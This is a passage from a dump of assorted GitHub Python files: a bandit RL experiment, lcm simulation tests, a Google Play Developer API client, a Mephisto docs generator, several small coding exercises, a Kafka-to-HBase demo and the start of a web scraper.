average\n q_estimate[action_idx] = q_estimate[action_idx] + \\\n 1/num_action[action_idx] * \\\n (r - q_estimate[action_idx])\n else:\n # const step size\n q_estimate[action_idx] = q_estimate[action_idx] + \\\n alpha * (r - q_estimate[action_idx])\n # Update true values\n for i in range(len(true_values)):\n s = np.random.normal(0, 0.01)\n true_values[i] += s\n # print(s)\n # print(\"{0:.5f}\".format(true_values[0]))\n avg_step_reward[:] = [x / num_run for x in avg_step_reward]\n avg_opt_ratio[:] = [x / num_run for x in avg_opt_ratio]\n\n return avg_step_reward, avg_opt_ratio\n\n\n# fig,axes = plt.subplots(2,1)\n# axes[0].plot(range(1, num_iter + 1), avg_step_reward)\n# axes[1].plot(range(1, num_iter + 1), avg_opt_ratio)\n# plt.show()\n\n# np.savetxt('out.txt', np.array(avg_step_reward))\n# np.savetxt('out.txt', np.array(avg_opt_ratio))\n\n# print(\"{0:.5f}\".format(true_values[0]))\n# print(avg_step_reward)\n\noutput_file = sys.argv[1]\nsample_avg_reward, sample_avg_opt = ten_arm_bandit(True)\nconst_step_reward, const_step_opt = ten_arm_bandit(False)\nnp.savetxt(output_file, np.array([sample_avg_reward, sample_avg_opt, const_step_reward, const_step_opt]))\n# np.savetxt(output_file, np.array(const_step_reward))\n# np.savetxt(output_file, np.array(const_step_opt))\n","repo_name":"Allen-Wu/CS394R-RL","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18493035239","text":"import jax.numpy as jnp\nimport pandas as pd\nimport pytest\nfrom jax import random\nfrom lcm.entry_point import (\n create_compute_conditional_continuation_policy,\n get_lcm_function,\n)\nfrom lcm.example_models import (\n N_CHOICE_GRID_POINTS,\n PHELPS_DEATON,\n PHELPS_DEATON_WITH_FILTERS,\n)\nfrom lcm.logging import get_logger\nfrom lcm.model_functions import get_utility_and_feasibility_function\nfrom lcm.next_state import _get_next_state_function_simulation\nfrom lcm.process_model import process_model\nfrom lcm.simulate import (\n _as_data_frame,\n _compute_targets,\n _generate_simulation_keys,\n _process_simulated_data,\n _retrieve_non_sparse_choices,\n create_choice_segments,\n create_data_scs,\n determine_discrete_dense_choice_axes,\n dict_product,\n filter_ccv_policy,\n simulate,\n)\nfrom lcm.state_space import create_state_choice_space\nfrom numpy.testing import assert_array_almost_equal, assert_array_equal\nfrom pybaum import tree_equal\n\n# ======================================================================================\n# Test simulate using raw inputs\n# ======================================================================================\n\n\n@pytest.fixture()\ndef simulate_inputs():\n user_model = {**PHELPS_DEATON, \"n_periods\": 1}\n model = process_model(user_model)\n\n _, space_info, _, _ = create_state_choice_space(\n model=model,\n period=0,\n is_last_period=False,\n jit_filter=False,\n )\n\n compute_ccv_policy_functions = []\n for period in range(model.n_periods):\n u_and_f = get_utility_and_feasibility_function(\n model=model,\n space_info=space_info,\n data_name=\"vf_arr\",\n interpolation_options={},\n period=period,\n is_last_period=True,\n )\n compute_ccv = create_compute_conditional_continuation_policy(\n utility_and_feasibility=u_and_f,\n continuous_choice_variables=[\"consumption\"],\n )\n compute_ccv_policy_functions.append(compute_ccv)\n\n return {\n \"state_indexers\": [{}],\n \"continuous_choice_grids\": [\n {\"consumption\": jnp.linspace(1, 100, num=N_CHOICE_GRID_POINTS)},\n ],\n \"compute_ccv_policy_functions\": compute_ccv_policy_functions,\n \"model\": model,\n \"next_state\": _get_next_state_function_simulation(model),\n }\n\n\ndef test_simulate_using_raw_inputs(simulate_inputs):\n params = {\n \"beta\": 1.0,\n \"utility\": {\"delta\": 1.0},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n },\n }\n\n got = simulate(\n params=params,\n vf_arr_list=[None],\n initial_states={\"wealth\": jnp.array([1.0, 50.400803])},\n logger=get_logger(debug_mode=False),\n **simulate_inputs,\n )\n\n assert_array_equal(got.loc[0, :][\"retirement\"], 1)\n assert_array_almost_equal(got.loc[0, :][\"consumption\"], jnp.array([1.0, 50.400803]))\n\n\n# ======================================================================================\n# Test simulate using get_lcm_function\n# ======================================================================================\n\n\n@pytest.fixture()\ndef phelps_deaton_model_solution():\n def _model_solution(n_periods):\n model = {**PHELPS_DEATON, \"n_periods\": n_periods}\n model[\"functions\"] = {\n # remove dependency on age, so that wage becomes a parameter\n name: func\n for name, func in model[\"functions\"].items()\n if name not in [\"age\", \"wage\"]\n }\n solve_model, _ = get_lcm_function(model=model)\n\n params = {\n \"beta\": 1.0,\n \"utility\": {\"delta\": 1.0},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n \"wage\": 1.0,\n },\n }\n\n vf_arr_list = solve_model(params)\n return vf_arr_list, params, model\n\n return _model_solution\n\n\n@pytest.mark.parametrize(\"n_periods\", range(3, PHELPS_DEATON[\"n_periods\"] + 1))\ndef test_simulate_using_get_lcm_function(phelps_deaton_model_solution, n_periods):\n vf_arr_list, params, model = phelps_deaton_model_solution(n_periods)\n\n simulate_model, _ = get_lcm_function(model=model, targets=\"simulate\")\n\n res = simulate_model(\n params,\n vf_arr_list=vf_arr_list,\n initial_states={\n \"wealth\": jnp.array([1.0, 20, 40, 70]),\n },\n additional_targets=[\"utility\", \"consumption_constraint\"],\n )\n\n assert {\n \"value\",\n \"retirement\",\n \"consumption\",\n \"wealth\",\n \"utility\",\n \"consumption_constraint\",\n } == set(res.columns)\n\n # assert that everyone retires in the last period\n last_period_index = n_periods - 1\n assert_array_equal(res.loc[last_period_index, :][\"retirement\"], 1)\n\n # assert that higher wealth leads to higher consumption\n for period in range(n_periods):\n assert (res.loc[period, :][\"consumption\"].diff()[1:] >= 0).all()\n\n # The following does not work. I.e. the continuation value in each period is not\n # weakly increasing in wealth. It is unclear if this needs to hold.\n # ------------------------------------------------------------------------------\n # assert jnp.all(jnp.diff(res[period][\"value\"]) >= 0) # noqa: ERA001\n\n\n# ======================================================================================\n# Testing effects of parameters\n# ======================================================================================\n\n\ndef test_effect_of_beta_on_last_period():\n model = {**PHELPS_DEATON, \"n_periods\": 5}\n\n # Model solutions\n # ==================================================================================\n solve_model, _ = get_lcm_function(model=model, targets=\"solve\")\n\n params = {\n \"beta\": None,\n \"utility\": {\"delta\": 1.0},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n },\n }\n\n # low beta\n params_low = params.copy()\n params_low[\"beta\"] = 0.5\n\n # high delta\n params_high = params.copy()\n params_high[\"beta\"] = 0.99\n\n # solutions\n solution_low = solve_model(params_low)\n solution_high = solve_model(params_high)\n\n # Simulate\n # ==================================================================================\n simulate_model, _ = get_lcm_function(model=model, targets=\"simulate\")\n\n initial_wealth = jnp.array([20.0, 50, 70])\n\n res_low = simulate_model(\n params_low,\n vf_arr_list=solution_low,\n initial_states={\"wealth\": initial_wealth},\n )\n\n res_high = simulate_model(\n params_high,\n vf_arr_list=solution_high,\n initial_states={\"wealth\": initial_wealth},\n )\n\n # Asserting\n # ==================================================================================\n last_period_index = 4\n assert (\n res_low.loc[last_period_index, :][\"value\"]\n <= res_high.loc[last_period_index, :][\"value\"]\n ).all()\n\n\ndef test_effect_of_delta():\n model = {**PHELPS_DEATON, \"n_periods\": 5}\n\n # Model solutions\n # ==================================================================================\n solve_model, _ = get_lcm_function(model=model, targets=\"solve\")\n\n params = {\n \"beta\": 1.0,\n \"utility\": {\"delta\": None},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n },\n }\n\n # low delta\n params_low = params.copy()\n params_low[\"utility\"][\"delta\"] = 0.2\n\n # high delta\n params_high = params.copy()\n params_high[\"utility\"][\"delta\"] = 1.5\n\n # solutions\n solution_low = solve_model(params_low)\n solution_high = solve_model(params_high)\n\n # Simulate\n # ==================================================================================\n simulate_model, _ = get_lcm_function(model=model, targets=\"simulate\")\n\n initial_wealth = jnp.array([20.0, 50, 70])\n\n res_low = simulate_model(\n params_low,\n vf_arr_list=solution_low,\n initial_states={\"wealth\": initial_wealth},\n )\n\n res_high = simulate_model(\n params_high,\n vf_arr_list=solution_high,\n initial_states={\"wealth\": initial_wealth},\n )\n\n # Asserting\n # ==================================================================================\n for period in range(5):\n assert (\n res_low.loc[period, :][\"consumption\"]\n <= res_high.loc[period, :][\"consumption\"]\n ).all()\n assert (\n res_low.loc[period, :][\"retirement\"]\n >= res_high.loc[period, :][\"retirement\"]\n ).all()\n\n\n# ======================================================================================\n# Helper functions\n# ======================================================================================\n\n\ndef test_generate_simulation_keys():\n key = jnp.arange(2, dtype=\"uint32\") # PRNG dtype\n stochastic_next_functions = [\"a\", \"b\"]\n got = _generate_simulation_keys(key, stochastic_next_functions)\n # assert that all generated keys are different from each other\n matrix = jnp.array([key, got[0], got[1][\"a\"], got[1][\"b\"]])\n assert jnp.linalg.matrix_rank(matrix) == 2\n\n\ndef test_as_data_frame():\n processed = {\n \"value\": -6 + jnp.arange(6),\n \"a\": jnp.arange(6),\n \"b\": 6 + jnp.arange(6),\n }\n got = _as_data_frame(processed, n_periods=2)\n expected = pd.DataFrame(\n {\n \"period\": [0, 0, 0, 1, 1, 1],\n \"initial_state_id\": [0, 1, 2, 0, 1, 2],\n **processed,\n },\n ).set_index([\"period\", \"initial_state_id\"])\n pd.testing.assert_frame_equal(got, expected)\n\n\ndef test_compute_targets():\n processed_results = {\n \"a\": jnp.arange(3),\n \"b\": 1 + jnp.arange(3),\n \"c\": 2 + jnp.arange(3),\n }\n\n def f_a(a, params):\n return a + params[\"delta\"]\n\n def f_b(b, params): # noqa: ARG001\n return b\n\n model_functions = {\"fa\": f_a, \"fb\": f_b, \"fc\": lambda _: None}\n\n got = _compute_targets(\n processed_results=processed_results,\n targets=[\"fa\", \"fb\"],\n model_functions=model_functions,\n params={\"delta\": -1.0},\n )\n expected = {\n \"fa\": jnp.arange(3) - 1.0,\n \"fb\": 1 + jnp.arange(3),\n }\n assert tree_equal(expected, got)\n\n\ndef test_process_simulated_data():\n simulated = [\n {\n \"value\": jnp.array([0.1, 0.2]),\n \"states\": {\"a\": jnp.array([1, 2]), \"b\": jnp.array([-1, -2])},\n \"choices\": {\"c\": jnp.array([5, 6]), \"d\": jnp.array([-5, -6])},\n },\n {\n \"value\": jnp.array([0.3, 0.4]),\n \"states\": {\n \"b\": jnp.array([-3, -4]),\n \"a\": jnp.array([3, 4]),\n },\n \"choices\": {\n \"d\": jnp.array([-7, -8]),\n \"c\": jnp.array([7, 8]),\n },\n },\n ]\n expected = {\n \"value\": jnp.array([0.1, 0.2, 0.3, 0.4]),\n \"c\": jnp.array([5, 6, 7, 8]),\n \"d\": jnp.array([-5, -6, -7, -8]),\n \"a\": jnp.array([1, 2, 3, 4]),\n \"b\": jnp.array([-1, -2, -3, -4]),\n }\n\n got = _process_simulated_data(simulated)\n assert tree_equal(expected, got)\n\n\ndef test_retrieve_non_sparse_choices():\n got = _retrieve_non_sparse_choices(\n index=jnp.array([0, 3, 7]),\n grids={\"a\": jnp.linspace(0, 1, 5), \"b\": jnp.linspace(10, 20, 6)},\n grid_shape=(5, 6),\n )\n assert_array_equal(got[\"a\"], jnp.array([0, 0, 0.25]))\n assert_array_equal(got[\"b\"], jnp.array([10, 16, 12]))\n\n\ndef test_filter_ccv_policy():\n ccc_policy = jnp.array(\n [\n [0, 1],\n [1, 0],\n ],\n )\n dense_argmax = jnp.array([0, 1])\n dense_vars_grid_shape = (2,)\n got = filter_ccv_policy(\n ccv_policy=ccc_policy,\n dense_argmax=dense_argmax,\n dense_vars_grid_shape=dense_vars_grid_shape,\n )\n assert jnp.all(got == jnp.array([0, 0]))\n\n\ndef test_create_data_state_choice_space():\n model = process_model(PHELPS_DEATON_WITH_FILTERS)\n got_space, got_segment_info = create_data_scs(\n states={\n \"wealth\": jnp.array([10.0, 20.0]),\n \"lagged_retirement\": jnp.array([0, 1]),\n },\n model=model,\n )\n assert got_space.dense_vars == {}\n assert_array_equal(got_space.sparse_vars[\"wealth\"], jnp.array([10.0, 10.0, 20.0]))\n assert_array_equal(got_space.sparse_vars[\"lagged_retirement\"], jnp.array([0, 0, 1]))\n assert_array_equal(got_space.sparse_vars[\"retirement\"], jnp.array([0, 1, 1]))\n assert_array_equal(got_segment_info[\"segment_ids\"], jnp.array([0, 0, 1]))\n assert got_segment_info[\"num_segments\"] == 2\n\n\ndef test_choice_segments():\n got = create_choice_segments(\n mask=jnp.array([True, False, True, False, True, False]),\n n_sparse_states=2,\n )\n assert_array_equal(jnp.array([0, 0, 1]), got[\"segment_ids\"])\n assert got[\"num_segments\"] == 2\n\n\ndef test_choice_segments_weakly_increasing():\n key = random.PRNGKey(12345)\n n_states, n_choices = random.randint(key, shape=(2,), minval=1, maxval=100)\n mask_len = n_states * n_choices\n mask = random.choice(key, a=2, shape=(mask_len,), p=jnp.array([0.5, 0.5]))\n got = create_choice_segments(mask, n_sparse_states=n_states)[\"segment_ids\"]\n assert jnp.all(got[1:] - got[:-1] >= 0)\n\n\ndef test_dict_product():\n d = {\"a\": jnp.array([0, 1]), \"b\": jnp.array([2, 3])}\n got_dict, got_length = dict_product(d)\n exp = {\"a\": jnp.array([0, 0, 1, 1]), \"b\": jnp.array([2, 3, 2, 3])}\n assert got_length == 4\n for key, val in exp.items():\n assert_array_equal(got_dict[key], val)\n\n\ndef test_determine_discrete_dense_choice_axes():\n variable_info = pd.DataFrame(\n {\n \"is_state\": [True, True, False, True, False, False],\n \"is_dense\": [False, True, True, False, True, True],\n \"is_choice\": [False, False, True, True, True, True],\n \"is_continuous\": [False, True, False, False, False, True],\n },\n )\n got = determine_discrete_dense_choice_axes(variable_info)\n assert got == (1, 2)\n","repo_name":"OpenSourceEconomics/lcm","sub_path":"tests/test_simulate.py","file_name":"test_simulate.py","file_ext":"py","file_size_in_byte":14093,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"73664490971","text":"\"\"\"Google services.\"\"\"\nfrom asyncio import create_task\nfrom enum import IntEnum, unique\nfrom typing import AsyncContextManager, Dict, List, Optional, Type, TypeVar\n\nimport attr\nfrom aiohttp import ClientSession\nfrom cattr import Converter\nfrom jwt import encode\nfrom pendulum import DateTime, from_timestamp\nfrom ujson import loads\n\nfrom pyrseia import ClientAdapter, create_client, rpc\nfrom pyrseia.aiohttp import aiohttp_client_adapter\nfrom pyrseia.wire import Call\n\n# Scope for purchases: https://www.googleapis.com/auth/androidpublisher\nBASE_URL = \"https://www.googleapis.com/androidpublisher/v3/applications\"\nACCESS_TOKEN_GRANT_TYPE = \"urn:ietf:params:oauth:grant-type:jwt-bearer\"\nSCOPE_ANDROIDPUBLISHER = \"https://www.googleapis.com/auth/androidpublisher\"\nconverter = Converter()\n\n\n@attr.s(auto_attribs=True)\nclass ServiceAccountCredentials:\n project_id: str\n auth_uri: str\n token_uri: str\n client_email: str\n private_key: str\n\n @classmethod\n def from_filename(cls, filename: str):\n with open(filename) as f:\n return converter.structure(loads(f.read()), cls)\n\n\n@attr.s(auto_exc=True, auto_attribs=True)\nclass HttpError(Exception):\n status_code: int\n response_payload: bytes\n\n\n@attr.s(auto_exc=True, auto_attribs=True)\nclass ParseError(Exception):\n payload: bytes\n\n\n@attr.s(slots=True, frozen=True)\nclass ProductPurchase:\n @unique\n class AcknowledgementState(IntEnum):\n NOT_ACKED = 0\n ACKED = 1\n\n @unique\n class ConsumptionState(IntEnum):\n NOT_CONSUMED = 0\n CONSUMED = 1\n\n @unique\n class PurchaseState(IntEnum):\n PURCHASED = 0\n CANCELED = 1\n PENDING = 2\n\n @unique\n class PurchaseType(IntEnum):\n TEST = 0\n PROMO = 1\n REWARDED = 2\n\n kind: str = attr.ib()\n acknowledgementState: AcknowledgementState = attr.ib()\n consumptionState: ConsumptionState = attr.ib()\n developerPayload: str = attr.ib()\n orderId: str = attr.ib()\n purchaseState: PurchaseState = attr.ib()\n purchaseTimeMillis: int = attr.ib()\n purchaseType: Optional[PurchaseType] = attr.ib(default=None)\n\n\n@attr.s(slots=True, frozen=True)\nclass VoidedPurchase:\n @unique\n class VoidedSource(IntEnum):\n USER = 0\n DEVELOPER = 1\n GOOGLE = 2\n\n @unique\n class VoidedReason(IntEnum):\n OTHER = 0\n REMORSE = 1\n NOT_RECEIVED = 2\n DEFECTIVE = 3\n ACCIDENTAL_PURCHASE = 4\n FRAUD = 5\n FRIENDLY_FRAUD = 6\n CHARGEBACK = 7\n\n kind: str = attr.ib()\n purchaseToken: str = attr.ib()\n purchaseTimeMillis: str = attr.ib()\n voidedTimeMillis: str = attr.ib()\n orderId: str = attr.ib()\n voidedSource: VoidedSource = attr.ib()\n voidedReason: VoidedReason = attr.ib()\n\n @property\n def purchase_time(self) -> DateTime:\n return from_timestamp(float(self.purchaseTimeMillis) / 1000)\n\n @property\n def voided_time(self) -> DateTime:\n return from_timestamp(float(self.voidedTimeMillis) / 1000)\n\n\n@attr.s(slots=True, frozen=True)\nclass VoidedPurchasesResponse:\n @attr.s(slots=True, frozen=True)\n class TokenPagination:\n nextPageToken: str = attr.ib()\n\n voidedPurchases: List[VoidedPurchase] = attr.ib()\n tokenPagination: Optional[TokenPagination] = attr.ib(default=None)\n\n\nclass GooglePlayDeveloperApi:\n @rpc\n async def get_purchases_products(\n self, package_name: str, product_id: str, token: str\n ) -> ProductPurchase:\n ...\n\n @rpc\n async def get_voided_purchases(\n self,\n package_name: str,\n start_time: Optional[int],\n end_time: Optional[int],\n token: Optional[str],\n type: int,\n ) -> VoidedPurchasesResponse:\n ...\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True)\nclass AccessToken:\n access_token: str\n token_type: str\n expires_in: int\n\n\nasync def request_access_token(\n session: ClientSession,\n url: str,\n creds: ServiceAccountCredentials,\n now: Optional[DateTime] = None,\n) -> AccessToken:\n now = now or DateTime.utcnow()\n assertion = encode(\n {\n \"iss\": creds.client_email,\n \"scope\": SCOPE_ANDROIDPUBLISHER,\n \"aud\": creds.token_uri,\n \"iat\": int(now.timestamp()),\n \"exp\": int(now.add(hours=1).timestamp()),\n },\n creds.private_key,\n algorithm=\"RS256\",\n ).decode(\"utf8\")\n\n async with session.post(\n url,\n data={\"grant_type\": ACCESS_TOKEN_GRANT_TYPE, \"assertion\": assertion},\n ) as resp:\n payload = await resp.read()\n if resp.status != 200:\n raise HttpError(resp.status, payload)\n return converter.structure(loads(payload), AccessToken)\n\n\nasync def invoke_api(\n session: ClientSession,\n token: str,\n url: str,\n query_params: Dict[str, str] = {},\n) -> bytes:\n async with session.get(\n url, params=query_params, headers={\"Authorization\": f\"Bearer {token}\"}\n ) as resp:\n resp_payload = await resp.read()\n if resp.status != 200:\n raise HttpError(resp.status, resp_payload)\n return resp_payload\n\n\nT = TypeVar(\"T\")\n\n\ndef google_client_network_adapter(\n creds: ServiceAccountCredentials,\n) -> AsyncContextManager[ClientAdapter]:\n token = None\n task = None\n\n async def sender(\n session: ClientSession, call: Call, resp_type: Type[T]\n ) -> T:\n nonlocal task, token\n if token is None:\n created_task = False\n if task is None:\n created_task = True\n task = create_task(\n request_access_token(session, creds.token_uri, creds)\n )\n local_task = task # 'task' will get cleaned up eventually.\n await local_task\n token = local_task.result()\n if created_task:\n task = None\n\n if call.name == \"get_purchases_products\":\n url = f\"{BASE_URL}/{call.args[0]}/purchases/products/{call.args[1]}/tokens/{call.args[2]}\"\n query_params: Dict[str, str] = {}\n elif call.name == \"get_voided_purchases\":\n url = f\"{BASE_URL}/{call.args[0]}/purchases/voidedpurchases\"\n query_params = {}\n if call.args[1] is not None:\n query_params[\"startTime\"] = str(call.args[1])\n if call.args[2] is not None:\n query_params[\"endTime\"] = str(call.args[2])\n if call.args[3] is not None:\n query_params[\"token\"] = str(call.args[3])\n if call.args[4] is not None:\n query_params[\"type\"] = str(call.args[4])\n try:\n resp = await invoke_api(\n session, token.access_token, url, query_params=query_params\n )\n except HttpError as exc:\n if exc.status_code == 401:\n # Refresh the access token.\n if task is not None:\n local_task = task\n await local_task\n local_token = local_task.result()\n else:\n task = create_task(\n request_access_token(session, creds.token_uri, creds)\n )\n await task\n local_token = token = task.result()\n task = None\n resp = await invoke_api(session, local_token.access_token, url)\n else:\n raise\n\n try:\n return converter.structure(loads(resp), resp_type)\n except Exception as exc:\n raise ParseError(resp) from exc\n\n return aiohttp_client_adapter(\"\", sender=sender)\n\n\nasync def create_google_client():\n return await create_client(\n GooglePlayDeveloperApi,\n google_client_network_adapter(\n ServiceAccountCredentials.from_filename(\"service.json\")\n ),\n )\n","repo_name":"Tinche/pyrseia","sub_path":"contrib/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"72253253531","text":"from mdutils.mdutils import MdUtils\nfrom mephisto.client.cli_commands import get_wut_arguments\nfrom mephisto.operations.registry import get_valid_architect_types\nfrom mephisto.scripts.local_db.gh_actions.auto_generate_blueprint import (\n create_blueprint_info,\n)\n\n\ndef main():\n architect_file = MdUtils(\n file_name=\"../../../../docs/web/docs/reference/architects.md\",\n )\n architect_file.new_header(level=1, title=\"Architects\")\n architect_file.new_paragraph(\n \"Architects contain the logic surrounding deploying a server that workers will be able to access.\"\n )\n valid_architect_types = get_valid_architect_types()\n for architect_type in valid_architect_types:\n architect_file.new_header(level=2, title=architect_type.replace(\"_\", \" \"))\n args = get_wut_arguments(\n (\"architect={architect_name}\".format(architect_name=architect_type),)\n )\n arg_dict = args[0]\n create_blueprint_info(architect_file, arg_dict)\n\n architect_file.create_md_file()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"facebookresearch/Mephisto","sub_path":"mephisto/scripts/local_db/gh_actions/auto_generate_architect.py","file_name":"auto_generate_architect.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"32"} +{"seq_id":"22703097565","text":"plants_list = {\"C\": \"Clover\", \"G\": \"Grass\", \"R\": \"Radishes\", \"V\": \"Violets\"}\n\nstudents_list = [\n \"Alice\",\n \"Bob\",\n \"Charlie\",\n \"David\",\n \"Eve\",\n \"Fred\",\n \"Ginny\",\n \"Harriet\",\n \"Ileana\",\n \"Joseph\",\n \"Kincaid\",\n \"Larry\",\n]\n\n\nclass Garden:\n def __init__(self, diagram, students=students_list):\n self.students = self.__parse_students(students)\n self.students_plants = self.__parse_diagram(diagram)\n\n def plants(self, student):\n return self.students_plants[student]\n\n def __parse_diagram(self, diagram):\n diagram_split = diagram.split()\n diagram_zip = list(zip(diagram_split[0], diagram_split[1]))\n list_of_groups = list(zip(*(iter(diagram_zip),) * 2))\n students_plants = {}\n for index, group in enumerate(list_of_groups):\n unify_tuple = (\n group[0][0] + group[1][0] + group[0][1] + group[1][1]\n ) # refactor this part tomorrow\n students_plants[self.students[index]] = [\n plants_list[p] for p in unify_tuple\n ]\n return students_plants\n\n def __parse_students(self, students):\n return sorted(students)\n","repo_name":"anaschwendler/everyday-exercise","sub_path":"python/kindergarten-garden/kindergarten_garden.py","file_name":"kindergarten_garden.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"27047622508","text":"import pygame\n\n\n#########################################\n# Game class\n# Functions:\n# __init__(bananas):\n# @params: bananas\n# bananas refers to the amount of bananas the user had\n# @brief: stores the amount of bananas in self.bananas\n# @return: none\n#\n# addBanana(amount):\n# @params amount\n# amount is the the number of bananas to add to the existing amount\n# @brief: updates the current number of bananas on the game itself depending\n# on the number of bananas added\n# @returns: none\n##########################################\n\nclass Game:\n def __init__(self,bananas,multiClicks):\n self.bananas = bananas\n self.clickMultiplier = multiClicks\n self.bananaPerClick = 1\n self.upgradeCost = ((10 + self.clickMultiplier) * 10)\n\n def addBanana(self):\n self.bananaPerClick = 1 + self.clickMultiplier\n self.bananas += self.bananaPerClick\n \n def multiClick(self):\n if(self.bananas >= self.upgradeCost):\n self.bananas -= self.upgradeCost\n self.clickMultiplier += 1\n self.upgradeCost += 10\n \n \n \n \n","repo_name":"Alexquiton/bananaclicker","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18744098134","text":"from typing import List\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n intersection = []\n nums1_dict = {}\n nums2_dict = {}\n\n for num in nums1:\n if num in nums1_dict:\n nums1_dict[num] += 1\n else:\n nums1_dict[num] = 1\n\n for num in nums2:\n if num in nums2_dict:\n nums2_dict[num] += 1\n else:\n nums2_dict[num] = 1\n\n for n in nums1_dict:\n if n in nums2_dict:\n if nums1_dict[n] < nums2_dict[n]:\n intersection.extend([n] * nums1_dict[n])\n else:\n intersection.extend([n] * nums2_dict[n])\n\n return intersection\n","repo_name":"ivankliuk/leetcode","sub_path":"python/intersection-of-two-arrays-ii.py","file_name":"intersection-of-two-arrays-ii.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32198902568","text":"\nheight = [int(input()) for _ in range(9)]\ntotal = sum(height)\nfor i in range(9):\n for j in range(i+1, 9):\n if total - (height[i] + height[j]) == 100:\n num1, num2 = height[i], height[j] # 값을 저장해두는 이유는 한개를 제거하게 되면 인덱스가 바뀌므로 값이 달라지기 때문에 삭제하기 전에 미리 저장을 해둔다.\n\n height.remove(num1) # pop()으로 삭제하면 인덱스가 달라지게 되면 값이 달라지므로 remove로 값으로 삭제를 하고 값은 삭제하기 전에 미리 다른 곳에 넣어둬서 한개를 삭제했을때 값이 달라져도 remove로 삭제할 수 있게 해준다.\n height.remove(num2)\n break\n if len(height) < 9:\n break\nheight.sort()\nfor i in height:\n print(i)\n\n","repo_name":"rlatmd0829/algorithm","sub_path":"알고리즘풀이/21.07.02/일곱난쟁이.py","file_name":"일곱난쟁이.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30785240409","text":"#!/usr/bin/env python\nimport threading, logging, time\nimport multiprocessing\nimport sys\n\nfrom kafka import KafkaConsumer, KafkaProducer\nimport happybase\n\n\nclass Producer(threading.Thread):\n def __init__(self, kafkaHost):\n threading.Thread.__init__(self)\n self.stop_event = threading.Event()\n \n def stop(self):\n self.stop_event.set()\n\n def run(self):\n producer = KafkaProducer(bootstrap_servers= kafkaHost + ':9092')\n print(\"producer: \" + str(producer))\n\n while not self.stop_event.is_set():\n producer.send('my-topic1', b\"<<<<<<<<< my-topic test\")\n producer.send('my-topic1', b\">>>>>>>>>> test\")\n time.sleep(1)\n\n producer.close()\n\n\n# class Consumer(multiprocessing.Process):\n# def __init__(self, kafkaHost, hbaseHost):\n# multiprocessing.Process.__init__(self)\n# self.stop_event = multiprocessing.Event()\n \n# def stop(self):\n# self.stop_event.set()\n \n# def run(self):\n# f=open(\"log\",\"w\")\n# consumer = KafkaConsumer('my-topic1',\n# bootstrap_servers= kafkaHost+':9092')\n# print(\"consumer: \" + consumer)\n# f.write(\"consumer: \" + consumer + \"\\n\")\n\n# connection = happybase.Connection(host=hbaseHost, port=9090)\n# connection.open()\n# print(\"connection: \" + connection)\n# f.write(\"connection: \" + connection + \"\\n\")\n\n# table = connection.table('my-topic11')\n# print(\"table: \" + table)\n# f.write(\"table: \" + table + \"\\n\")\n \n# count = 0\n# while not self.stop_event.is_set():\n# for message in consumer:\n# count += 1\n# print(\"message: \" + message.value)\n# f.write(\"message: \" + message.value + \"\\n\")\n \n# table.put('row-key' + str(count), {'cf:col1': message.value})\n# if self.stop_event.is_set():\n# break\n\n# for key, data in table.scan():\n# print(key, data)\n \n# f.close()\n# consumer.close()\n\nclass Consumer(threading.Thread):\n def __init__(self, kafkaHost, hbaseHost):\n threading.Thread.__init__(self)\n self.stop_event = threading.Event()\n \n def stop(self):\n self.stop_event.set()\n\n def run(self):\n consumer = KafkaConsumer('my-topic1',\n bootstrap_servers=[ kafkaHost + ':9092'])\n print(\"consumer: \"+ str(consumer))\n \n connection = happybase.Connection(host=hbaseHost, port=9090)\n connection.open()\n\n table = connection.table('my-topic11')\n \n count = 0\n while not self.stop_event.is_set():\n for message in consumer:\n count += 1\n print (\"%s:%d:%d: key=%s value=%s\" % (message.topic, message.partition,\n message.offset, message.key,\n message.value))\n table.put('row-key' + str(count), {'cf:col1': message.value})\n if self.stop_event.is_set():\n break\n\n for key, data in table.scan():\n print(key, data)\n \n consumer.close()\n \n \ndef main(kafkaHost, hbaseHost):\n\n tasks = [\n Producer(kafkaHost),\n Consumer(kafkaHost, hbaseHost)\n ]\n\n for t in tasks:\n t.daemon = True\n t.start()\n\n time.sleep(5)\n \n for task in tasks:\n task.stop()\n\n for task in tasks:\n task.join()\n \n \nif __name__ == \"__main__\":\n logging.basicConfig(\n format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',\n level=logging.INFO\n )\n kafkaHost = sys.argv[1]\n hbaseHost = sys.argv[2]\n main(kafkaHost, hbaseHost)\n","repo_name":"BigdataFlatformDynamicConfiguration/kafka-hbase","sub_path":"kafka-hbase.py","file_name":"kafka-hbase.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72036368090","text":"import time\nimport random\nimport csv\nimport os\nfrom datetime import datetime\nfrom urllib.parse import urlparse, parse_qs\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nBASE_URL = 'https://redistricting.colorado.gov'\nTHIS_DIR = os.path.dirname(os.path.realpath(__file__))\nURL_PATTERN = 